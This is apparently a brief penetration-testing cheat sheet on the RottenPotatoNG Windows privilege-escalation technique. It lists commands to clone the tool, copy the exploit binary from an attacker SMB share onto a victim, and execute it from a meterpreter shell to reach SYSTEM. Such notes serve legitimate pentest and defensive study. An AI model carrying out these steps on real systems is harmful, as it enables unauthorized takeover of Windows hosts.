RottenPotatoNG

Windows privilege escalation technique.

• Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
• Potatoes – Windows Privilege Escalation

Use when winPEAS or “whoami /priv” says the the account has “SeImpersonatePrivilege” or equivalent. Usually includes many service accounts in Windows such as the IIS and SQL Server accounts.

Download RottenPotatoNG

Code for RottenPotato is no longer maintained. Use newer implementation RottenPotatoNG (GitHub) instead.

git clone https://github.com/breenmachine/RottenPotatoNG.git

Upload file to the victim

Use Impacket smbserver.

copy \\x.x.x.x\myshare\RottenPotatoNG\RottenPotatoEXE\x64\Release\MSFRottenPotato.exe C:\<some path on victim>\MSFRottenPotato.exe

Execute the exploit

After having a meterpreter shell with incognito mode loaded:

MSFRottenPotato.exe t c:\windows\temp\test.bat